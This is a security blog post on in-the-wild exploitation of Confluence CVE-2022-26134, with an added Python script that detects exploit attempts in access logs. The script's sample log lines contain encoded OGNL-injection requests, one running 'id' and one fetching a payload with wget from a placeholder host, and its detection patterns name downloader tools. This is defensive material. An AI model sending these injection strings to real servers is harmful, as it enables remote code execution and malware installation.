Threat Spotlight: Attempts to exploit Atlassian Confluence zero day
On June 2, 2022, Volexity performed a coordinated disclosure of a zero-day vulnerability in Atlassian Confluence being exploited in the wild, CVE-2022-26134. Since the original disclosure and subsequent publication of various proofs of concept, Barracuda researchers have analyzed data from our installations worldwide and discovered a large number of attempts to exploit this vulnerability. The exploit attempts range from benign reconnaissance to some relatively complex attempts to infect systems with DDoS botnet malware and cryptominers.
Barracuda researchers have seen a steady flow of attacks over time, with some spikes, notably one on June 13. We expect a significant volume of such attempts to continue for the time being.
Atlassian Confluence zero day
Atlassian Confluence is a tool that provides collaborative documentation. On June 2, information about what is now known as CVE-2022-26134 was publicly released. Malicious actors became aware of it almost immediately, and by the following weekend the vulnerability was being used by various threat actors in attacks.
The vulnerability is an OGNL injection that allows unauthenticated, remote attackers to execute arbitrary code on the Confluence server; from there they can create new administrative accounts, run privileged commands, and in turn seize control of the server.
Exploitation attempts primarily originated from IP addresses in Russia, followed by the U.S., India, Netherlands, and Germany. As seen in previous research, the attacks seen originating from U.S. IP addresses are primarily from cloud providers. Similarly, for Germany, most attacks were from hosting providers.
Let’s warm up by looking at some of the more “benign” payloads that we saw.
Moving on to the web shells, below is an example of an attempt to drop a web shell that was seen in our samples.
This web shell is almost an exact copy of a sample web shell from “The Art of Network Penetration Testing” by Royce Davis.
The next example is one of the more immediately destructive attempts to perform malicious actions.
Payloads dropping Mirai malware
We also saw a number of attempts to infect Confluence servers with malware. Threat actors are always looking for new vulnerabilities to exploit in their attempts to grow their botnets. Let’s look at a few examples of this.
Looking at VirusTotal shows that a number of security vendors have classified this as malware, and the site is known for hosting other Mirai downloads as well.
This is another straightforward example of an attempted insertion of the Mirai DDoS malware:
How to protect against these types of attacks
As noted earlier, the interest level in this vulnerability remains steady with occasional spikes, and our researchers expect to see scanning and attempts to exploit it for some time. Because interest from cybercriminals is so high, it’s important to take steps to protect your systems.
- Patching — The ideal time to patch is now, especially if the system is internet-facing in any way.
- Web application firewall — Placing a web application firewall in front of such systems adds a layer of defense in depth against zero-day attacks and other vulnerabilities, and buys time until the patch can be applied.
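Patching and a WAF close the door going forward, but a practitioner also wants to know whether the door was already tried. The script below is an added example, not Barracuda's code or Atlassian's, that scans Combined Log Format web-server access logs for the one feature every public exploit for CVE-2022-26134 shares: a URL-encoded OGNL expression (`${...}`) in the request path. It then sorts hits into the rough intent buckets the article describes (command execution for reconnaissance, malware downloaders). The log lines, IP addresses (documentation ranges) and keyword lists are constructed for the example; the `classify`, `scan_log` and `summarize` names are mine.

```python
"""Flag CVE-2022-26134 exploit attempts in web-server access logs.

Added example (not Barracuda's code). Assumes Combined Log Format, as written
by Apache/nginx reverse proxies in front of Confluence. The sample log lines
below are constructed; 198.51.100.0/24, 203.0.113.0/24 and 192.0.2.0/24 are
documentation address ranges, not real attackers or payload hosts.
"""
import re
import urllib.parse
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log. Lines 1-2 imitate the public exploit form for
# CVE-2022-26134: a percent-encoded OGNL expression in the request path.
# Line 3 is ordinary Confluence traffic and must not be flagged.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Jun/2022:10:02:11 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.79.1"
198.51.100.9 - - [13/Jun/2022:10:05:42 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22wget%20http%3A%2F%2F192.0.2.10%2Fbins.sh%22%29%7D/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jun/2022:10:06:01 +0000] "GET /display/DOCS/Getting+Started HTTP/1.1" 200 18422 "-" "Mozilla/5.0"
"""

# Combined Log Format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)
# Intent heuristics applied to the decoded path (assumed lists; extend as needed).
DOWNLOADER_RE = re.compile(r'\b(wget|curl|tftp|ftpget)\b', re.IGNORECASE)
EXEC_RE = re.compile(r'Runtime|ProcessBuilder|\.exec\(', re.IGNORECASE)


@dataclass
class Finding:
    src_ip: str
    timestamp: str
    status: str
    category: str
    decoded_path: str


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding, repeating because attackers double-encode to dodge naive filters."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(decoded_path: str) -> Optional[str]:
    """Return an intent bucket for an OGNL-bearing path, or None if the path is clean."""
    if "${" not in decoded_path:
        return None
    # Check for downloaders first: a wget/curl payload also matches EXEC_RE.
    if DOWNLOADER_RE.search(decoded_path):
        return "downloader"
    if EXEC_RE.search(decoded_path):
        return "command-exec"
    return "ognl-other"


def scan_log(text: str) -> List[Finding]:
    """Parse each log line, decode the path and keep the lines that carry an OGNL expression."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line (or truncated); skip rather than guess
        decoded = fully_decode(m["path"])
        category = classify(decoded)
        if category:
            findings.append(Finding(m["ip"], m["ts"], m["status"], category, decoded))
    return findings


def summarize(findings: List[Finding]) -> dict:
    """Count findings per intent bucket."""
    return dict(Counter(f.category for f in findings))


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h.timestamp} {h.src_ip:15} {h.category:13} {h.decoded_path}")
    print(summarize(hits))
```

Two caveats when running this over real logs: the HTTP status in the access log does not tell you whether the injected command actually ran, so a hit is a reason to look at the Confluence host itself (unexpected child processes of the Java process, new admin accounts, unfamiliar .jsp files) rather than a verdict; and the `${` check is deliberately broad, so tune it against your own traffic before wiring it into alerting.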
In part 2 of this report, we’ll take a closer look at the cryptominers that we have been seeing and dive a bit deeper into some interesting competitive behavior from one of them.